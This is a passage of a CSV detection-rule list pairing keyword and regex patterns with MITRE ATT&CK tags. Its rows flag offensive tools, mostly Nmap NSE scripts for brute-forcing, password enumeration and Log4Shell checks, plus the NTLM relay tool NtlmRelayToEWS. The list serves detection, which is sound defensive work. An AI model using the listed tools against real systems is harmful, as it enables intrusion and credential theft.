T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-devframework.nse*",".{0,1000}\shttp\-devframework\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-dlink-backdoor.nse*",".{0,1000}\shttp\-dlink\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-dombased-xss.nse*",".{0,1000}\shttp\-dombased\-xss\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-domino-enum-passwords.nse*",".{0,1000}\shttp\-domino\-enum\-passwords\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-drupal-enum.nse*",".{0,1000}\shttp\-drupal\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-drupal-enum-users.nse*",".{0,1000}\shttp\-drupal\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-enum.nse*",".{0,1000}\shttp\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-errors.nse*",".{0,1000}\shttp\-errors\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-exif-spider.nse*",".{0,1000}\shttp\-exif\-spider\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-favicon.nse*",".{0,1000}\shttp\-favicon\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-feed.nse*",".{0,1000}\shttp\-feed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-fetch.nse*",".{0,1000}\shttp\-fetch\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-fileupload-exploiter.nse*",".{0,1000}\shttp\-fileupload\-exploiter\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-form-brute.nse*",".{0,1000}\shttp\-form\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-form-fuzzer.nse*",".{0,1000}\shttp\-form\-fuzzer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-frontpage-login.nse*",".{0,1000}\shttp\-frontpage\-login\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-generator.nse*",".{0,1000}\shttp\-generator\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-git.nse*",".{0,1000}\shttp\-git\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-gitweb-projects-enum.nse*",".{0,1000}\shttp\-gitweb\-projects\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-google-malware.nse*",".{0,1000}\shttp\-google\-malware\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-grep.nse*",".{0,1000}\shttp\-grep\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-headers.nse*",".{0,1000}\shttp\-headers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-hp-ilo-info.nse*",".{0,1000}\shttp\-hp\-ilo\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-huawei-hg5xx-vuln.nse*",".{0,1000}\shttp\-huawei\-hg5xx\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-icloud-findmyiphone.nse*",".{0,1000}\shttp\-icloud\-findmyiphone\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-icloud-sendmsg.nse*",".{0,1000}\shttp\-icloud\-sendmsg\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-iis-short-name-brute.nse*",".{0,1000}\shttp\-iis\-short\-name\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-iis-webdav-vuln.nse*",".{0,1000}\shttp\-iis\-webdav\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-internal-ip-disclosure.nse*",".{0,1000}\shttp\-internal\-ip\-disclosure\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-joomla-brute.nse*",".{0,1000}\shttp\-joomla\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-jsonp-detection.nse*",".{0,1000}\shttp\-jsonp\-detection\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-lexmark-version.nse*",".{0,1000}\shttp\-lexmark\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","0","N/A","N/A","7","620","61","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z" "* http-lfi.nse*",".{0,1000}\shttp\-lfi\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","10","936","371","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "* http-litespeed-sourcecode-download.nse*",".{0,1000}\shttp\-litespeed\-sourcecode\-download\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-log4shell.nse*",".{0,1000}\shttp\-log4shell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","349","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" "* http-ls.nse*",".{0,1000}\shttp\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-majordomo2-dir-traversal.nse*",".{0,1000}\shttp\-majordomo2\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-malware-host.nse*",".{0,1000}\shttp\-malware\-host\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-mcmp.nse*",".{0,1000}\shttp\-mcmp\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-methods.nse*",".{0,1000}\shttp\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-method-tamper.nse*",".{0,1000}\shttp\-method\-tamper\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-mobileversion-checker.nse*",".{0,1000}\shttp\-mobileversion\-checker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-nikto-scan.nse*",".{0,1000}\shttp\-nikto\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","10","936","371","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "* http-ntlm-info.nse*",".{0,1000}\shttp\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-open-proxy.nse*",".{0,1000}\shttp\-open\-proxy\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-open-redirect.nse*",".{0,1000}\shttp\-open\-redirect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-passwd.nse*",".{0,1000}\shttp\-passwd\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-phpmyadmin-dir-traversal.nse*",".{0,1000}\shttp\-phpmyadmin\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-phpself-xss.nse*",".{0,1000}\shttp\-phpself\-xss\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-php-version.nse*",".{0,1000}\shttp\-php\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-proxy-brute.nse*",".{0,1000}\shttp\-proxy\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-put.nse*",".{0,1000}\shttp\-put\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-qnap-nas-info.nse*",".{0,1000}\shttp\-qnap\-nas\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-referer-checker.nse*",".{0,1000}\shttp\-referer\-checker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* httprelayserver.py*",".{0,1000}\shttprelayserver\.py.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","0","N/A","10","4","327","62","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z" "* http-rfi-spider.nse*",".{0,1000}\shttp\-rfi\-spider\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-robots.txt.nse*",".{0,1000}\shttp\-robots\.txt\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-robtex-reverse-ip.nse*",".{0,1000}\shttp\-robtex\-reverse\-ip\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-robtex-shared-ns.nse*",".{0,1000}\shttp\-robtex\-shared\-ns\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* https -i 0.0.0.0 -P * -k * --private-cert * --public-cert *",".{0,1000}\shttps\s\-i\s0\.0\.0\.0\s\-P\s.{0,1000}\s\-k\s.{0,1000}\s\-\-private\-cert\s.{0,1000}\s\-\-public\-cert\s.{0,1000}","offensive_tool_keyword","RDE1","RDE1 